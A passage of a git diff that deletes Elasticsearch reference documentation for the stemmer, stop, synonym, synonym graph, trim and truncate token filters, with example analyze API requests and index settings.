+0,0 @@ -[[analysis-stemmer-tokenfilter]] -=== Stemmer token filter -++++ -Stemmer -++++ - -Provides <> for several languages, -some with additional variants. For a list of supported languages, see the -<> parameter. - -When not customized, the filter uses the -https://snowballstem.org/algorithms/porter/stemmer.html[porter stemming -algorithm] for English. - -[[analysis-stemmer-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `stemmer` filter's default porter -stemming algorithm to stem `the foxes jumping quickly` to `the fox jump -quickli`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "stemmer" ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quickli ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quickli", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-stemmer-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`stemmer` filter to configure a new <>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ "stemmer" ] - } - } - } - } -} ----- - -[role="child_attributes"] -[[analysis-stemmer-tokenfilter-configure-parms]] -==== Configurable parameters - -[[analysis-stemmer-tokenfilter-language-parm]] -`language`:: -(Optional, string) -Language-dependent stemming algorithm used to stem tokens. If both this and the -`name` parameter are specified, the `language` parameter argument is used. -+ -[%collapsible%open] -.Valid values for `language` -==== -Valid values are sorted by language. Defaults to -https://snowballstem.org/algorithms/porter/stemmer.html[*`english`*]. -Recommended algorithms are *bolded*. - -Arabic:: -{lucene-analysis-docs}/ar/ArabicStemmer.html[*`arabic`*] - -Armenian:: -https://snowballstem.org/algorithms/armenian/stemmer.html[*`armenian`*] - -Basque:: -https://snowballstem.org/algorithms/basque/stemmer.html[*`basque`*] - -Bengali:: -https://www.tandfonline.com/doi/abs/10.1080/02564602.1993.11437284[*`bengali`*] - -Brazilian Portuguese:: -{lucene-analysis-docs}/br/BrazilianStemmer.html[*`brazilian`*] - -Bulgarian:: -http://members.unine.ch/jacques.savoy/Papers/BUIR.pdf[*`bulgarian`*] - -Catalan:: -https://snowballstem.org/algorithms/catalan/stemmer.html[*`catalan`*] - -Czech:: -https://dl.acm.org/doi/10.1016/j.ipm.2009.06.001[*`czech`*] - -Danish:: -https://snowballstem.org/algorithms/danish/stemmer.html[*`danish`*] - -Dutch:: -https://snowballstem.org/algorithms/dutch/stemmer.html[*`dutch`*], -https://snowballstem.org/algorithms/kraaij_pohlmann/stemmer.html[`dutch_kp`] - -English:: -https://snowballstem.org/algorithms/porter/stemmer.html[*`english`*], -https://ciir.cs.umass.edu/pubfiles/ir-35.pdf[`light_english`], -https://snowballstem.org/algorithms/lovins/stemmer.html[`lovins`], -https://www.researchgate.net/publication/220433848_How_effective_is_suffixing[`minimal_english`], -https://snowballstem.org/algorithms/english/stemmer.html[`porter2`], -{lucene-analysis-docs}/en/EnglishPossessiveFilter.html[`possessive_english`] - -Estonian:: -https://lucene.apache.org/core/{lucene_version_path}/analyzers-common/org/tartarus/snowball/ext/EstonianStemmer.html[*`estonian`*] - -Finnish:: -https://snowballstem.org/algorithms/finnish/stemmer.html[*`finnish`*], -http://clef.isti.cnr.it/2003/WN_web/22.pdf[`light_finnish`] - -French:: -https://dl.acm.org/citation.cfm?id=1141523[*`light_french`*], -https://snowballstem.org/algorithms/french/stemmer.html[`french`], -https://dl.acm.org/citation.cfm?id=318984[`minimal_french`] - -Galician:: -http://bvg.udc.es/recursos_lingua/stemming.jsp[*`galician`*], -http://bvg.udc.es/recursos_lingua/stemming.jsp[`minimal_galician`] (Plural step only) - -German:: -https://dl.acm.org/citation.cfm?id=1141523[*`light_german`*], -https://snowballstem.org/algorithms/german/stemmer.html[`german`], -https://snowballstem.org/algorithms/german2/stemmer.html[`german2`], -http://members.unine.ch/jacques.savoy/clef/morpho.pdf[`minimal_german`] - -Greek:: -https://sais.se/mthprize/2007/ntais2007.pdf[*`greek`*] - -Hindi:: -http://computing.open.ac.uk/Sites/EACLSouthAsia/Papers/p6-Ramanathan.pdf[*`hindi`*] - -Hungarian:: -https://snowballstem.org/algorithms/hungarian/stemmer.html[*`hungarian`*], -https://dl.acm.org/citation.cfm?id=1141523&dl=ACM&coll=DL&CFID=179095584&CFTOKEN=80067181[`light_hungarian`] - -Indonesian:: -http://www.illc.uva.nl/Publications/ResearchReports/MoL-2003-02.text.pdf[*`indonesian`*] - -Irish:: -https://snowballstem.org/otherapps/oregan/[*`irish`*] - -Italian:: -https://www.ercim.eu/publication/ws-proceedings/CLEF2/savoy.pdf[*`light_italian`*], -https://snowballstem.org/algorithms/italian/stemmer.html[`italian`] - -Kurdish (Sorani):: -{lucene-analysis-docs}/ckb/SoraniStemmer.html[*`sorani`*] - -Latvian:: -{lucene-analysis-docs}/lv/LatvianStemmer.html[*`latvian`*] - -Lithuanian:: -https://svn.apache.org/viewvc/lucene/dev/branches/lucene_solr_5_3/lucene/analysis/common/src/java/org/apache/lucene/analysis/lt/stem_ISO_8859_1.sbl?view=markup[*`lithuanian`*] - -Norwegian (Bokmål):: -https://snowballstem.org/algorithms/norwegian/stemmer.html[*`norwegian`*], -{lucene-analysis-docs}/no/NorwegianLightStemmer.html[*`light_norwegian`*], -{lucene-analysis-docs}/no/NorwegianMinimalStemmer.html[`minimal_norwegian`] - -Norwegian (Nynorsk):: -{lucene-analysis-docs}/no/NorwegianLightStemmer.html[*`light_nynorsk`*], -{lucene-analysis-docs}/no/NorwegianMinimalStemmer.html[`minimal_nynorsk`] - -Portuguese:: -https://dl.acm.org/citation.cfm?id=1141523&dl=ACM&coll=DL&CFID=179095584&CFTOKEN=80067181[*`light_portuguese`*], -pass:macros[http://www.inf.ufrgs.br/~buriol/papers/Orengo_CLEF07.pdf[`minimal_portuguese`\]], -https://snowballstem.org/algorithms/portuguese/stemmer.html[`portuguese`], -https://www.inf.ufrgs.br/\~viviane/rslp/index.htm[`portuguese_rslp`] - -Romanian:: -https://snowballstem.org/algorithms/romanian/stemmer.html[*`romanian`*] - -Russian:: -https://snowballstem.org/algorithms/russian/stemmer.html[*`russian`*], -https://doc.rero.ch/lm.php?url=1000%2C43%2C4%2C20091209094227-CA%2FDolamic_Ljiljana_-_Indexing_and_Searching_Strategies_for_the_Russian_20091209.pdf[`light_russian`] - -Spanish:: -https://www.ercim.eu/publication/ws-proceedings/CLEF2/savoy.pdf[*`light_spanish`*], -https://snowballstem.org/algorithms/spanish/stemmer.html[`spanish`] - -Swedish:: -https://snowballstem.org/algorithms/swedish/stemmer.html[*`swedish`*], -http://clef.isti.cnr.it/2003/WN_web/22.pdf[`light_swedish`] - -Turkish:: -https://snowballstem.org/algorithms/turkish/stemmer.html[*`turkish`*] -==== - -`name`:: -An alias for the <> -parameter. If both this and the `language` parameter are specified, the -`language` parameter argument is used. - -[[analysis-stemmer-tokenfilter-customize]] -==== Customize - -To customize the `stemmer` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `stemmer` filter that stems -words using the `light_german` algorithm: - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "my_stemmer" - ] - } - }, - "filter": { - "my_stemmer": { - "type": "stemmer", - "language": "light_german" - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/stop-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/stop-tokenfilter.asciidoc deleted file mode 100644 index e3eef08efc9..00000000000 --- a/docs/reference/analysis/tokenfilters/stop-tokenfilter.asciidoc +++ /dev/null @@ -1,377 +0,0 @@ -[[analysis-stop-tokenfilter]] -=== Stop token filter -++++ -Stop -++++ - -Removes {wikipedia}/Stop_words[stop words] from a token -stream. - -When not customized, the filter removes the following English stop words by -default: - -`a`, `an`, `and`, `are`, `as`, `at`, `be`, `but`, `by`, `for`, `if`, `in`, -`into`, `is`, `it`, `no`, `not`, `of`, `on`, `or`, `such`, `that`, `the`, -`their`, `then`, `there`, `these`, `they`, `this`, `to`, `was`, `will`, `with` - -In addition to English, the `stop` filter supports predefined -<>. You can also specify your own stop words as an array or file. - -The `stop` filter uses Lucene's -https://lucene.apache.org/core/{lucene_version_path}/core/org/apache/lucene/analysis/StopFilter.html[StopFilter]. - -[[analysis-stop-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `stop` filter to remove the stop words -`a` and `the` from `a quick fox jumps over the lazy dog`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "stop" ], - "text": "a quick fox jumps over the lazy dog" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ quick, fox, jumps, over, lazy, dog ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 2, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "fox", - "start_offset": 8, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "jumps", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "over", - "start_offset": 18, - "end_offset": 22, - "type": "", - "position": 4 - }, - { - "token": "lazy", - "start_offset": 27, - "end_offset": 31, - "type": "", - "position": 6 - }, - { - "token": "dog", - "start_offset": 32, - "end_offset": 35, - "type": "", - "position": 7 - } - ] -} ----- -//// - -[[analysis-stop-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the `stop` -filter to configure a new <>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ "stop" ] - } - } - } - } -} ----- - -[[analysis-stop-tokenfilter-configure-parms]] -==== Configurable parameters - -`stopwords`:: -+ --- -(Optional, string or array of strings) -Language value, such as `_arabic_` or `_thai_`. Defaults to -<>. - -Each language value corresponds to a predefined list of stop words in Lucene. -See <> for supported language -values and their stop words. - -Also accepts an array of stop words. - -For an empty list of stop words, use `_none_`. --- - -`stopwords_path`:: -+ --- -(Optional, string) -Path to a file that contains a list of stop words to remove. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each stop word in the file must be separated by a line -break. --- - -`ignore_case`:: -(Optional, Boolean) -If `true`, stop word matching is case insensitive. For example, if `true`, a -stop word of `the` matches and removes `The`, `THE`, or `the`. Defaults to -`false`. - -`remove_trailing`:: -+ --- -(Optional, Boolean) -If `true`, the last token of a stream is removed if it's a stop word. Defaults -to `true`. - -This parameter should be `false` when using the filter with a -<>. This would ensure a query like -`green a` matches and suggests `green apple` while still removing other stop -words. --- - -[[analysis-stop-tokenfilter-customize]] -==== Customize - -To customize the `stop` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom case-insensitive `stop` -filter that removes stop words from the <> stop -words list: - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "my_custom_stop_words_filter" ] - } - }, - "filter": { - "my_custom_stop_words_filter": { - "type": "stop", - "ignore_case": true - } - } - } - } -} ----- - -You can also specify your own list of stop words. For example, the following -request creates a custom case-sensitive `stop` filter that removes only the stop -words `and`, `is`, and `the`: - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "tokenizer": "whitespace", - "filter": [ "my_custom_stop_words_filter" ] - } - }, - "filter": { - "my_custom_stop_words_filter": { - "type": "stop", - "ignore_case": true, - "stopwords": [ "and", "is", "the" ] - } - } - } - } -} ----- - -[[analysis-stop-tokenfilter-stop-words-by-lang]] -==== Stop words by language - -The following list contains supported language values for the `stopwords` -parameter and a link to their predefined stop words in Lucene. - -[[arabic-stop-words]] -`_arabic_`:: -{lucene-stop-word-link}/ar/stopwords.txt[Arabic stop words] - -[[armenian-stop-words]] -`_armenian_`:: -{lucene-stop-word-link}/hy/stopwords.txt[Armenian stop words] - -[[basque-stop-words]] -`_basque_`:: -{lucene-stop-word-link}/eu/stopwords.txt[Basque stop words] - -[[bengali-stop-words]] -`_bengali_`:: -{lucene-stop-word-link}/bn/stopwords.txt[Bengali stop words] - -[[brazilian-stop-words]] -`_brazilian_` (Brazilian Portuguese):: -{lucene-stop-word-link}/br/stopwords.txt[Brazilian Portuguese stop words] - -[[bulgarian-stop-words]] -`_bulgarian_`:: -{lucene-stop-word-link}/bg/stopwords.txt[Bulgarian stop words] - -[[catalan-stop-words]] -`_catalan_`:: -{lucene-stop-word-link}/ca/stopwords.txt[Catalan stop words] - -[[cjk-stop-words]] -`_cjk_` (Chinese, Japanese, and Korean):: -{lucene-stop-word-link}/cjk/stopwords.txt[CJK stop words] - -[[czech-stop-words]] -`_czech_`:: -{lucene-stop-word-link}/cz/stopwords.txt[Czech stop words] - -[[danish-stop-words]] -`_danish_`:: -{lucene-stop-word-link}/snowball/danish_stop.txt[Danish stop words] - -[[dutch-stop-words]] -`_dutch_`:: -{lucene-stop-word-link}/snowball/dutch_stop.txt[Dutch stop words] - -[[english-stop-words]] -`_english_`:: -https://github.com/apache/lucene-solr/blob/master/lucene/analysis/common/src/java/org/apache/lucene/analysis/en/EnglishAnalyzer.java#L46[English stop words] - -[[estonian-stop-words]] -`_estonian_`:: -https://github.com/apache/lucene-solr/blob/master/lucene/analysis/common/src/resources/org/apache/lucene/analysis/et/stopwords.txt[Estonian stop words] - -[[finnish-stop-words]] -`_finnish_`:: -{lucene-stop-word-link}/snowball/finnish_stop.txt[Finnish stop words] - -[[french-stop-words]] -`_french_`:: -{lucene-stop-word-link}/snowball/french_stop.txt[French stop words] - -[[galician-stop-words]] -`_galician_`:: -{lucene-stop-word-link}/gl/stopwords.txt[Galician stop words] - -[[german-stop-words]] -`_german_`:: -{lucene-stop-word-link}/snowball/german_stop.txt[German stop words] - -[[greek-stop-words]] -`_greek_`:: -{lucene-stop-word-link}/el/stopwords.txt[Greek stop words] - -[[hindi-stop-words]] -`_hindi_`:: -{lucene-stop-word-link}/hi/stopwords.txt[Hindi stop words] - -[[hungarian-stop-words]] -`_hungarian_`:: -{lucene-stop-word-link}/snowball/hungarian_stop.txt[Hungarian stop words] - -[[indonesian-stop-words]] -`_indonesian_`:: -{lucene-stop-word-link}/id/stopwords.txt[Indonesian stop words] - -[[irish-stop-words]] -`_irish_`:: -{lucene-stop-word-link}/ga/stopwords.txt[Irish stop words] - -[[italian-stop-words]] -`_italian_`:: -{lucene-stop-word-link}/snowball/italian_stop.txt[Italian stop words] - -[[latvian-stop-words]] -`_latvian_`:: -{lucene-stop-word-link}/lv/stopwords.txt[Latvian stop words] - -[[lithuanian-stop-words]] -`_lithuanian_`:: -{lucene-stop-word-link}/lt/stopwords.txt[Lithuanian stop words] - -[[norwegian-stop-words]] -`_norwegian_`:: -{lucene-stop-word-link}/snowball/norwegian_stop.txt[Norwegian stop words] - -[[persian-stop-words]] -`_persian_`:: -{lucene-stop-word-link}/fa/stopwords.txt[Persian stop words] - -[[portuguese-stop-words]] -`_portuguese_`:: -{lucene-stop-word-link}/snowball/portuguese_stop.txt[Portuguese stop words] - -[[romanian-stop-words]] -`_romanian_`:: -{lucene-stop-word-link}/ro/stopwords.txt[Romanian stop words] - -[[russian-stop-words]] -`_russian_`:: -{lucene-stop-word-link}/snowball/russian_stop.txt[Russian stop words] - -[[sorani-stop-words]] -`_sorani_`:: -{lucene-stop-word-link}/ckb/stopwords.txt[Sorani stop words] - -[[spanish-stop-words]] -`_spanish_`:: -{lucene-stop-word-link}/snowball/spanish_stop.txt[Spanish stop words] - -[[swedish-stop-words]] -`_swedish_`:: -{lucene-stop-word-link}/snowball/swedish_stop.txt[Swedish stop words] - -[[thai-stop-words]] -`_thai_`:: -{lucene-stop-word-link}/th/stopwords.txt[Thai stop words] - -[[turkish-stop-words]] -`_turkish_`:: -{lucene-stop-word-link}/tr/stopwords.txt[Turkish stop words] \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/synonym-graph-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/synonym-graph-tokenfilter.asciidoc deleted file mode 100644 index bc288fbf720..00000000000 --- a/docs/reference/analysis/tokenfilters/synonym-graph-tokenfilter.asciidoc +++ /dev/null @@ -1,198 +0,0 @@ -[[analysis-synonym-graph-tokenfilter]] -=== Synonym graph token filter -++++ -Synonym graph -++++ - -The `synonym_graph` token filter allows to easily handle synonyms, -including multi-word synonyms correctly during the analysis process. - -In order to properly handle multi-word synonyms this token filter -creates a <> during processing. For more -information on this topic and its various complexities, please read the -http://blog.mikemccandless.com/2012/04/lucenes-tokenstreams-are-actually.html[Lucene's TokenStreams are actually graphs] blog post. - -["NOTE",id="synonym-graph-index-note"] -=============================== -This token filter is designed to be used as part of a search analyzer -only. If you want to apply synonyms during indexing please use the -standard <>. -=============================== - -Synonyms are configured using a configuration file. -Here is an example: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "search_synonyms": { - "tokenizer": "whitespace", - "filter": [ "graph_synonyms" ] - } - }, - "filter": { - "graph_synonyms": { - "type": "synonym_graph", - "synonyms_path": "analysis/synonym.txt" - } - } - } - } - } -} --------------------------------------------------- - -The above configures a `search_synonyms` filter, with a path of -`analysis/synonym.txt` (relative to the `config` location). The -`search_synonyms` analyzer is then configured with the filter. - -Additional settings are: - -* `expand` (defaults to `true`). -* `lenient` (defaults to `false`). If `true` ignores exceptions while parsing the synonym configuration. It is important -to note that only those synonym rules which cannot get parsed are ignored. For instance consider the following request: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "synonym": { - "tokenizer": "standard", - "filter": [ "my_stop", "synonym_graph" ] - } - }, - "filter": { - "my_stop": { - "type": "stop", - "stopwords": [ "bar" ] - }, - "synonym_graph": { - "type": "synonym_graph", - "lenient": true, - "synonyms": [ "foo, bar => baz" ] - } - } - } - } - } -} --------------------------------------------------- - -With the above request the word `bar` gets skipped but a mapping `foo => baz` is still added. However, if the mapping -being added was `foo, baz => bar` nothing would get added to the synonym list. This is because the target word for the -mapping is itself eliminated because it was a stop word. Similarly, if the mapping was "bar, foo, baz" and `expand` was -set to `false` no mapping would get added as when `expand=false` the target mapping is the first word. However, if -`expand=true` then the mappings added would be equivalent to `foo, baz => foo, baz` i.e, all mappings other than the -stop word. - -[discrete] -[[synonym-graph-tokenizer-ignore_case-deprecated]] -==== `tokenizer` and `ignore_case` are deprecated - -The `tokenizer` parameter controls the tokenizers that will be used to -tokenize the synonym, this parameter is for backwards compatibility for indices that created before 6.0.. -The `ignore_case` parameter works with `tokenizer` parameter only. - -Two synonym formats are supported: Solr, WordNet. - -[discrete] -==== Solr synonyms - -The following is a sample format of the file: - -[source,synonyms] --------------------------------------------------- -include::{es-test-dir}/cluster/config/analysis/synonym.txt[] --------------------------------------------------- - -You can also define synonyms for the filter directly in the -configuration file (note use of `synonyms` instead of `synonyms_path`): - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym_graph", - "synonyms": [ - "lol, laughing out loud", - "universe, cosmos" - ] - } - } - } - } - } -} --------------------------------------------------- - -However, it is recommended to define large synonyms set in a file using -`synonyms_path`, because specifying them inline increases cluster size unnecessarily. - -[discrete] -==== WordNet synonyms - -Synonyms based on https://wordnet.princeton.edu/[WordNet] format can be -declared using `format`: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym_graph", - "format": "wordnet", - "synonyms": [ - "s(100000001,1,'abstain',v,1,0).", - "s(100000001,2,'refrain',v,1,0).", - "s(100000001,3,'desist',v,1,0)." - ] - } - } - } - } - } -} --------------------------------------------------- - -Using `synonyms_path` to define WordNet synonyms in a file is supported -as well. - -[discrete] -==== Parsing synonym files - -Elasticsearch will use the token filters preceding the synonym filter -in a tokenizer chain to parse the entries in a synonym file. So, for example, if a -synonym filter is placed after a stemmer, then the stemmer will also be applied -to the synonym entries. Because entries in the synonym map cannot have stacked -positions, some token filters may cause issues here. Token filters that produce -multiple versions of a token may choose which version of the token to emit when -parsing synonyms, e.g. `asciifolding` will only produce the folded version of the -token. Others, e.g. `multiplexer`, `word_delimiter_graph` or `ngram` will throw an -error. - -If you need to build analyzers that include both multi-token filters and synonym -filters, consider using the <> filter, -with the multi-token filters in one branch and the synonym filter in the other. - -WARNING: The synonym rules should not contain words that are removed by -a filter that appears after in the chain (a `stop` filter for instance). -Removing a term from a synonym rule breaks the matching at query time. - diff --git a/docs/reference/analysis/tokenfilters/synonym-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/synonym-tokenfilter.asciidoc deleted file mode 100644 index 77cf7f371df..00000000000 --- a/docs/reference/analysis/tokenfilters/synonym-tokenfilter.asciidoc +++ /dev/null @@ -1,184 +0,0 @@ -[[analysis-synonym-tokenfilter]] -=== Synonym token filter -++++ -Synonym -++++ - -The `synonym` token filter allows to easily handle synonyms during the -analysis process. Synonyms are configured using a configuration file. -Here is an example: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "synonym": { - "tokenizer": "whitespace", - "filter": [ "synonym" ] - } - }, - "filter": { - "synonym": { - "type": "synonym", - "synonyms_path": "analysis/synonym.txt" - } - } - } - } - } -} --------------------------------------------------- - -The above configures a `synonym` filter, with a path of -`analysis/synonym.txt` (relative to the `config` location). The -`synonym` analyzer is then configured with the filter. - -This filter tokenizes synonyms with whatever tokenizer and token filters -appear before it in the chain. - -Additional settings are: - -* `expand` (defaults to `true`). -* `lenient` (defaults to `false`). If `true` ignores exceptions while parsing the synonym configuration. It is important -to note that only those synonym rules which cannot get parsed are ignored. For instance consider the following request: - - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "synonym": { - "tokenizer": "standard", - "filter": [ "my_stop", "synonym" ] - } - }, - "filter": { - "my_stop": { - "type": "stop", - "stopwords": [ "bar" ] - }, - "synonym": { - "type": "synonym", - "lenient": true, - "synonyms": [ "foo, bar => baz" ] - } - } - } - } - } -} --------------------------------------------------- - -With the above request the word `bar` gets skipped but a mapping `foo => baz` is still added. However, if the mapping -being added was `foo, baz => bar` nothing would get added to the synonym list. This is because the target word for the -mapping is itself eliminated because it was a stop word. Similarly, if the mapping was "bar, foo, baz" and `expand` was -set to `false` no mapping would get added as when `expand=false` the target mapping is the first word. However, if -`expand=true` then the mappings added would be equivalent to `foo, baz => foo, baz` i.e, all mappings other than the -stop word. - - -[discrete] -[[synonym-tokenizer-ignore_case-deprecated]] -==== `tokenizer` and `ignore_case` are deprecated - -The `tokenizer` parameter controls the tokenizers that will be used to -tokenize the synonym, this parameter is for backwards compatibility for indices that created before 6.0. -The `ignore_case` parameter works with `tokenizer` parameter only. - -Two synonym formats are supported: Solr, WordNet. - -[discrete] -==== Solr synonyms - -The following is a sample format of the file: - -[source,synonyms] --------------------------------------------------- -include::{es-test-dir}/cluster/config/analysis/synonym.txt[] --------------------------------------------------- - -You can also define synonyms for the filter directly in the -configuration file (note use of `synonyms` instead of `synonyms_path`): - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym", - "synonyms": [ - "i-pod, i pod => ipod", - "universe, cosmos" - ] - } - } - } - } - } -} --------------------------------------------------- - -However, it is recommended to define large synonyms set in a file using -`synonyms_path`, because specifying them inline increases cluster size unnecessarily. - -[discrete] -==== WordNet synonyms - -Synonyms based on https://wordnet.princeton.edu/[WordNet] format can be -declared using `format`: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym", - "format": "wordnet", - "synonyms": [ - "s(100000001,1,'abstain',v,1,0).", - "s(100000001,2,'refrain',v,1,0).", - "s(100000001,3,'desist',v,1,0)." - ] - } - } - } - } - } -} --------------------------------------------------- - -Using `synonyms_path` to define WordNet synonyms in a file is supported -as well. - -[discrete] -=== Parsing synonym files - -Elasticsearch will use the token filters preceding the synonym filter -in a tokenizer chain to parse the entries in a synonym file. So, for example, if a -synonym filter is placed after a stemmer, then the stemmer will also be applied -to the synonym entries. Because entries in the synonym map cannot have stacked -positions, some token filters may cause issues here. Token filters that produce -multiple versions of a token may choose which version of the token to emit when -parsing synonyms, e.g. `asciifolding` will only produce the folded version of the -token. Others, e.g. `multiplexer`, `word_delimiter_graph` or `ngram` will throw an -error. - -If you need to build analyzers that include both multi-token filters and synonym -filters, consider using the <> filter, -with the multi-token filters in one branch and the synonym filter in the other. diff --git a/docs/reference/analysis/tokenfilters/trim-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/trim-tokenfilter.asciidoc deleted file mode 100644 index b69f71b7bdc..00000000000 --- a/docs/reference/analysis/tokenfilters/trim-tokenfilter.asciidoc +++ /dev/null @@ -1,113 +0,0 @@ -[[analysis-trim-tokenfilter]] -=== Trim token filter -++++ -Trim -++++ - -Removes leading and trailing whitespace from each token in a stream. While this -can change the length of a token, the `trim` filter does _not_ change a token's -offsets. - -The `trim` filter uses Lucene's -https://lucene.apache.org/core/{lucene_version_path}/analyzers-common/org/apache/lucene/analysis/miscellaneous/TrimFilter.html[TrimFilter]. - -[TIP] -==== -Many commonly used tokenizers, such as the -<> or -<> tokenizer, remove whitespace by -default. When using these tokenizers, you don't need to add a separate `trim` -filter. -==== - -[[analysis-trim-tokenfilter-analyze-ex]] -==== Example - -To see how the `trim` filter works, you first need to produce a token -containing whitespace. - -The following <> request uses the -<> tokenizer to produce a token for -`" fox "`. - -[source,console] ----- -GET _analyze -{ - "tokenizer" : "keyword", - "text" : " fox " -} ----- - -The API returns the following response. Note the `" fox "` token contains the -original text's whitespace. Note that despite changing the token's length, the -`start_offset` and `end_offset` remain the same. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": " fox ", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - } - ] -} ----- - -To remove the whitespace, add the `trim` filter to the previous analyze API -request. - -[source,console] ----- -GET _analyze -{ - "tokenizer" : "keyword", - "filter" : ["trim"], - "text" : " fox " -} ----- - -The API returns the following response. The returned `fox` token does not -include any leading or trailing whitespace. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - } - ] -} ----- - -[[analysis-trim-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the `trim` -filter to configure a new <>. - -[source,console] ----- -PUT trim_example -{ - "settings": { - "analysis": { - "analyzer": { - "keyword_trim": { - "tokenizer": "keyword", - "filter": [ "trim" ] - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/truncate-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/truncate-tokenfilter.asciidoc deleted file mode 100644 index a77387d5fd4..00000000000 --- a/docs/reference/analysis/tokenfilters/truncate-tokenfilter.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[analysis-truncate-tokenfilter]] -=== Truncate token filter -++++ -Truncate -++++ - -Truncates tokens that exceed a specified character limit. This limit defaults to -`10` but can be customized using the `length` parameter. - -For example, you can use the `truncate` filter to shorten all tokens to -`3` characters or fewer, changing `jumping fox` to `jum fox`. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/TruncateTokenFilter.html[TruncateTokenFilter]. - -[[analysis-truncate-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `truncate` filter -to shorten tokens that exceed 10 characters in -`the quinquennial extravaganza carried on`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "whitespace", - "filter" : ["truncate"], - "text" : "the quinquennial extravaganza carried on" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, quinquenni, extravagan, carried, on ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "quinquenni", - "start_offset" : 4, - "end_offset" : 16, - "type" : "word", - "position" : 1 - }, - { - "token" : "extravagan", - "start_offset" : 17, - "end_offset" : 29, - "type" : "word", - "position" : 2 - }, - { - "token" : "carried", - "start_offset" : 30, - "end_offset" : 37, - "type" : "word", - "position" : 3 - }, - { - "token" : "on", - "start_offset" : 38, - "end_offset" : 40, - "type" : "word", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-truncate-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`truncate` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT custom_truncate_example -{ - "settings" : { - "analysis" : { - "analyzer" : { - "standard_truncate" : { - "tokenizer" : "standard", - "filter" : ["truncate"] - } - } - } - } -} --------------------------------------------------- - -[[analysis-truncate-tokenfilter-configure-parms]] -==== Configurable parameters - -`length`:: -(Optional, integer) -Character limit for each token. Tokens exceeding this limit are truncated. -Defaults to `10`. - -[[analysis-truncate-tokenfilter-customize]] -==== Customize - -To customize the `truncate` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `truncate` filter, 